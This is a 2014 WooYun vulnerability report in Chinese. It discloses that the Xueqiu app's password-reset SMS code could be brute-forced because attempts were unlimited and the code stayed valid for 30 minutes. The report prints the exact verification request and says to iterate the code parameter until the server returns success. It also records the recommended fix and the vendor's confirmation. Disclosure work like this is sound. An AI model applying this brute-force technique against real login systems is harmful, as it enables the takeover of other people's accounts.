当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061438

漏洞标题:雪球手机app登陆任意帐户漏洞

相关厂商:雪球

漏洞作者: detouer

提交时间:2014-05-19 18:40

修复时间:2014-07-03 18:40

公开时间:2014-07-03 18:40

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-19: 细节已通知厂商并且等待厂商处理中
2014-05-19: 厂商已经确认,细节仅向厂商公开
2014-05-29: 细节向核心白帽子及相关领域专家公开
2014-06-08: 细节向普通白帽子公开
2014-06-18: 细节向实习白帽子公开
2014-07-03: 细节向公众公开

简要描述:

在知道手机号码的情况下,可以登陆任意雪球的帐户

详细说明:

雪球手机app的忘记密码功能使用手机验证码验证,但是没有限制验证码的验证次数,而且验证时间长达30分钟,可以有足够的时间来遍历验证码,直到验证成功。如下所示:

POST /account/sms/verify_code.json HTTP/1.1
Host: api.xueqiu.com
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip, deflate
Cookie: xq_a_token=6RSyzZ5lx6q61i2FkLRWne
Accept-Language: zh-Hans;q=1, en;q=0.9, zh-Hant;q=0.8, fr;q=0.7, de;q=0.6, ja;q=0.5
Accept: application/json
Content-Length: 92
Connection: keep-alive
User-Agent: Xueqiu iPhone 4.3
_=1400481516&access_token=6RSyzZ5lx6q61i2FkLRWne&areacode=86&code=3752&telephone=185*******


遍历参数code的值,直到返回success!

HTTP/1.1 200 OK
Date: Mon, 19 May 2014 07:36:38 GMT
Server: Tengine
Content-Type: application/json; charset=UTF-8
Content-Language: zh-HANS
Expires: Mon, 19 May 2014 07:36:38 GMT
Cache-Control: max-age=0
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Whom: n122
X-Via: 1.1 bjzwsx84:8101 (Cdn Cache Server V2.0), 1.1 stzc78:0 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 16
{"success":true}


漏洞证明:

修复方案:

限制验证次数,缩短验证时间,验证码增长为6位

版权声明:转载请注明来源 detouer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-05-19 19:02

厂商回复:

确认问题,正在修改,感谢白帽子

最新状态:

2014-05-19:漏洞已经修复,感谢

2014-05-24:Rank 应该为 18 特此修改,谢谢白帽子